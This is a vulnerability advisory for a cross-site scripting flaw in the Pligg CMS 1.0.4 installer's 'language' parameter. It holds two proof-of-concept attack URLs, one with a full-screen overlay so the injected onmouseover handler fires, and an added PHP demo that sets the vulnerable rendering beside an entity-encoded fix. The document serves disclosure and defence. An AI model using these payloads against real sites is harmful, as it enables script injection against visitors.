
Pligg Installation File XSS Vulnerability

Title: Pligg Installation File XSS Vulnerability
Vendor: Pligg
Product: Pligg CMS
Tested Version: 1.0.4
Threat Class: XSS
Severity: Medium
Remote: yes
Local: no
Discovered By: Andrei Rimsa Alvares

===== Description ====
Pligg is prone to an XSS vulnerability in the installation file install/install1.php. The "language" variable, taken from the HTTP request, is written into the value attribute of an input tag and can be manipulated to execute JavaScript through event-handler attributes such as onmouseover. Even with the two sanitizers applied (strip_tags and addslashes), the double-quote jail of the value attribute can be escaped by passing a double quote in the "language" variable.

----- install/install1.php -----
20: 
----- install/install1.php -----

The sanitizer strip_tags prevents new tags from being introduced (a <script> tag, for instance), but it does not filter attribute-based attacks such as onmouseover. addslashes inserts backslashes to escape special characters such as the double quote, but since HTML does not process backslash escape sequences, this sanitizer is useless for preventing a break out of the double-quote jail, regardless of whether magic_quotes is enabled or not. The only encoding that matters in an attribute context is HTML entity encoding of the quote character itself.

===== Impact ====
Malicious JavaScript code can be executed in the context of the affected web site.

===== Proof of Concept ====
A simple proof of concept demonstrating the double-quote jail bypass is shown below. On its own, however, this is not exploitable, because the input field is hidden, so its onmouseover handler never fires.

http://target/install/install1.php?language=%22%20onmouseover=alert()%3E 

To overcome this limitation and provide a realistic attack scenario, we used a technique taken from [1]. The injected style attribute enlarges the affected input field so that it covers the whole screen. Once the mouse is moved anywhere on the page, the onmouseover handler fires and executes the malicious code. In this proof of concept, an alert containing the message "XSS" is shown as soon as the mouse moves.

http://target/install/install1.php?language=%22%20style=a:b;margin-top:-1000px;margin-left:-100px;width:4000px;height:4000px;display:block;%20onmouseover=alert%28String.fromCharCode%2888,83,83%29%29;%3E

The vector used in this proof of concept had no effect on Google Chrome, but was successfully exploited on Mozilla Firefox and other browsers.
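The following is an added example, not Pligg's code: it emulates the rendering of the hidden "language" field with the two sanitizers the advisory describes (strip_tags followed by addslashes), feeds it both proof-of-concept payloads plus a magic_quotes-style pre-escaped variant, and contrasts the result with attribute-context encoding via htmlspecialchars(ENT_QUOTES). The shape of the input tag and the function names are assumptions; the exact Pligg source line is not reproduced on this page.

```php
<?php
// Added example (not from Pligg). The input-tag shape below is an assumption
// that matches the advisory's description of install/install1.php.

// Vulnerable rendering as described in the advisory: strip_tags removes
// tags, addslashes adds backslashes, but a raw double quote still reaches
// the attribute and terminates value="...".
function render_vulnerable(string $language): string
{
    $clean = addslashes(strip_tags($language));
    return '<input type="hidden" name="language" value="' . $clean . '">';
}

// Hardened rendering: entity-encode for the attribute context. ENT_QUOTES
// turns " into &quot;, so the payload can never close the value attribute.
function render_fixed(string $language): string
{
    $clean = htmlspecialchars($language, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="hidden" name="language" value="' . $clean . '">';
}

// Crude check used only for this demo: does the rendered tag still contain
// a raw double quote inside the value attribute? If so, the jail is broken.
function value_attribute_is_escaped(string $html): bool
{
    $prefix = 'value="';
    $start  = strpos($html, $prefix) + strlen($prefix);
    $end    = strrpos($html, '">');           // closing quote of the tag
    $inner  = substr($html, $start, $end - $start);
    return strpos($inner, '"') === false;
}

// Constructed payloads, as they arrive after URL decoding of the PoC URLs.
$payloads = [
    'simple'       => '" onmouseover=alert()>',
    'magic_quotes' => addslashes('" onmouseover=alert()>'),   // magic_quotes_gpc=On
    'overlay'      => '" style=a:b;margin-top:-1000px;margin-left:-100px;width:4000px;'
                    . 'height:4000px;display:block; onmouseover=alert(String.fromCharCode(88,83,83));>',
];

foreach ($payloads as $name => $p) {
    $vuln  = render_vulnerable($p);
    $fixed = render_fixed($p);
    printf("--- %s ---\n", $name);
    printf("vulnerable: %s\n  escaped? %s\n", $vuln,  value_attribute_is_escaped($vuln)  ? 'yes' : 'NO');
    printf("fixed:      %s\n  escaped? %s\n", $fixed, value_attribute_is_escaped($fixed) ? 'yes' : 'NO');
}
```

Running it shows the vulnerable path emitting value="\" onmouseover=alert()>"> for the first payload: the browser reads the attribute value as a single backslash, then parses onmouseover as a new attribute. The magic_quotes variant only stacks more backslashes in front of the quote, which is why the advisory notes the bypass works either way. The hardened path emits value="&quot; onmouseover=alert()&gt;" and the whole payload stays inert text inside the attribute.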

===== Workaround ====
Remove the installation directory after installation, as recommended during the installation process.

===== Disclosure Timeline ====
June 16, 2010 - Vendor notification.
June 22, 2010 - Vendor replied but did not acknowledge the bug.
June 22, 2010 - New contact attempted to provide more details about the bug.
July 07, 2010 - No vendor reply. Public disclosure.

===== References ====
1. http://www.packetstormsecurity.org/papers/bypass/workaround-xss.txt 
2. http://www.pligg.com 
